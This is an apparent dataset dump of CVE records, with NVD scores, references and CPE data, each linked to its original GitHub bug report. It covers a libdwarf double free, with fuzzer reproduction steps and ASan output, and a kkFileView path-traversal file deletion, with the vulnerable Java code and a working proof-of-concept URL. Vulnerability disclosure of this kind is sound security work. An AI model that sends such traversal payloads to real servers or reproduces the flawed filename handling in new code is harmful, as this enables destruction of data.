00000093`9ecffbb0 00007ffd`b0d8ce51 KERNEL32!BaseThreadInitThunk+0x14 15 00000093`9ecffbe0 00000000`00000000 ntdll!RtlUserThreadStart+0x21 **System Configuration:** - ImageMagick: Version: ImageMagick-7.0.10-Q16 https://imagemagick.org License: https://imagemagick.org/script/license.php - Environment (Operating system, version and so on): Distributor ID: Microsoft Windows Description: Windows 10
Libraw "LibRaw::parseSonySRF()" Out-of-bounds Read Vulnerability
https://api.github.com/repos/LibRaw/LibRaw/issues/283/comments
1
2020-05-10T17:30:28Z
2020-05-10T18:24:18Z
https://github.com/LibRaw/LibRaw/issues/283
615,438,367
283
4,080
CVE-2022-39170
2022-09-02T03:15:07.527
libdwarf 0.4.1 has a double free in _dwarf_exec_frame_instr in dwarf_frame.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/davea42/libdwarf-code/commit/60303eb80ecc7747bf29776d545e2a5c5a76f6f8" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/davea42/libdwarf-code/issues/132" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IKUE4XT62AEZ3H5D6GMREYOSCMMRFXBH/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/davea42/libdwarf-code/commit/60303eb80ecc7747bf29776d545e2a5c5a76f6f8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/davea42/libdwarf-code/issues/132" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IKUE4XT62AEZ3H5D6GMREYOSCMMRFXBH/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libdwarf_project:libdwarf:0.4.1:*:*:*:*:*:*:*", "matchCriteriaId": "DE7E818D-510D-47B1-8DB9-299F4344D6D8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:37:*:*:*:*:*:*:*", "matchCriteriaId": "E30D0E6F-4AE8-4284-8716-991DFA48CC5D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "415" ]
415
https://github.com/davea42/libdwarf-code/issues/132
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "davea42", "libdwarf-code" ]
Hello, I was testing my fuzzer and found a double free in dwarfdump, _dwarf_exec_frame_instr bug. A double free will be triggered when parsing a crafted file, when running ./dwarfdump -vv -a $POC, as shown in the attachment ## Environment Ubuntu 22.04 gcc 11.2.0 libdwarf latest commit 271cc04a1bdd1f47d641ab9219fb138aa02839ff ## step to reproduce ``` export CC="gcc -fsanitize=address -g" ./autogen.sh && ./configure --disable-shared && make -j8 ./src/bin/dwarfdump/dwarfdump -vv -a $POC ``` ## ASan Output ``` ================================================================= ==4097834==ERROR: AddressSanitizer: attempting double-free on 0x60c000000a00 in thread T0: #0 0x7fe56d032517 in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:127 #1 0x55c03cd25761 in _dwarf_exec_frame_instr /validate/libdwarf-code/src/lib/libdwarf/dwarf_frame.c:1501 #2 0x55c03cd2c801 in dwarf_expand_frame_instructions /validate/libdwarf-code/src/lib/libdwarf/dwarf_frame.c:2547 #3 0x55c03ccd8db4 in print_one_fde /validate/libdwarf-code/src/bin/dwarfdump/print_frames.c:1356 #4 0x55c03ccd8db4 in print_all_fdes /validate/libdwarf-code/src/bin/dwarfdump/print_frames.c:2147 #5 0x55c03ccd8db4 in print_frames /validate/libdwarf-code/src/bin/dwarfdump/print_frames.c:2367 #6 0x55c03cc8db9a in process_one_file /validate/libdwarf-code/src/bin/dwarfdump/dwarfdump.c:1176 #7 0x55c03cc782a4 in main /validate/libdwarf-code/src/bin/dwarfdump/dwarfdump.c:503 #8 0x7fe56cd63d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58 #9 0x7fe56cd63e3f in __libc_start_main_impl ../csu/libc-start.c:392 #10 0x55c03cc798c4 in _start (/validate/libdwarf-code/src/bin/dwarfdump/dwarfdump+0x618c4) 0x60c000000a00 is located 0 bytes inside of 128-byte region [0x60c000000a00,0x60c000000a80) freed by thread T0 here: #0 0x7fe56d032517 in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:127 #1 0x55c03cd257b3 in _dwarf_free_dfi_list /validate/libdwarf-code/src/lib/libdwarf/dwarf_frame.c:225 #2 0x55c03cd257b3 in _dwarf_exec_frame_instr /validate/libdwarf-code/src/lib/libdwarf/dwarf_frame.c:1501 previously allocated by thread T0 here: #0 0x7fe56d032a37 in __interceptor_calloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:154 #1 0x55c03cd21dc2 in _dwarf_exec_frame_instr /validate/libdwarf-code/src/lib/libdwarf/dwarf_frame.c:447 SUMMARY: AddressSanitizer: double-free ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:127 in __interceptor_free ==4097834==ABORTING ``` ## POC [poc.zip](https://github.com/davea42/libdwarf-code/files/9437551/poc.zip) ## Credit Han Zheng ([NCNIPC of China](http://www.nipc.org.cn), [Hexhive](http://hexhive.epfl.ch))
[BUG] double free in _dwarf_exec_frame_instr
https://api.github.com/repos/davea42/libdwarf-code/issues/132/comments
1
2022-08-27T08:23:55Z
2022-08-29T22:20:39Z
https://github.com/davea42/libdwarf-code/issues/132
1,352,982,801
132
4,081
CVE-2022-36593
2022-09-02T04:15:11.267
kkFileView v4.0.0 was discovered to contain an arbitrary file deletion vulnerability via the fileName parameter at /controller/FileController.java.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 2.5, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kekingcn/kkFileView/issues/370" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kekingcn/kkFileView/issues/370" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:keking:kkfileview:4.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "14029A50-34F9-451F-800A-5A21EE2822A0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/kekingcn/kkFileView/issues/370
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "kekingcn", "kkFileView" ]
问题描述Description kkFileview v4.0.0存在任意文件删除漏洞,可能导致系统任意文件被删除。 kkFileview v4.0.0 has an arbitrary file deletion vulnerability, which may lead to arbitrary file being deleted. 漏洞位置vulerable code location src/main/java/cn/keking/web/controller/FileController.java文件78行,fileName参数用户可控,由于只截取"/"后面的内容作为文件名,导致可以利用“..\"来实现目录遍历,导致任意文件删除漏洞。 The vulnerability code is located at line 78 in src/main/java/cn/keking/web/controller/FileController.java, the fileName parameter can be controlled by user. and it fetch the content after "/" as fileName, which leads to we can use "..\" to achieve directory traverse that result in arbitrary file deletion. @RequestMapping(value = "deleteFile", method = RequestMethod.GET) public String deleteFile(String fileName) throws JsonProcessingException { if (fileName.contains("/")) { fileName = fileName.substring(fileName.lastIndexOf("/") + 1); } File file = new File(fileDir + demoPath + fileName); logger.info("删除文件:{}", file.getAbsolutePath()); if (file.exists() && !file.delete()) { logger.error("删除文件【{}】失败,请检查目录权限!",file.getPath()); } return new ObjectMapper().writeValueAsString(ReturnResponse.success()); } 漏洞证明PoC /deleteFile?fileName=demo%2F..\calc.pdf get请求此uri会删除\kkFileView-master\server\src\main\file目录中的calc.pdf(原本只能删除\kkFileView-master\server\src\main\file\demo目录下的文件) POC /deleteFile?fileName=demo%2F..\calc.pdf request this uri by HTTP GET method will delete \kkFileView-master\server\src\main\file\calc.pdf (which logically should delete \kkFileView-master\server\src\main\file\demo\calc.pdf) 免责声明:请勿使用漏洞在他人部署的服务上进行测试、攻击,否则所有法律责任自行承担。
kkFileView arbitrary file deletion vulnerability
https://api.github.com/repos/kekingcn/kkFileView/issues/370/comments
2
2022-07-20T05:59:04Z
2022-07-25T10:33:59Z
https://github.com/kekingcn/kkFileView/issues/370
1,310,483,184
370
4,082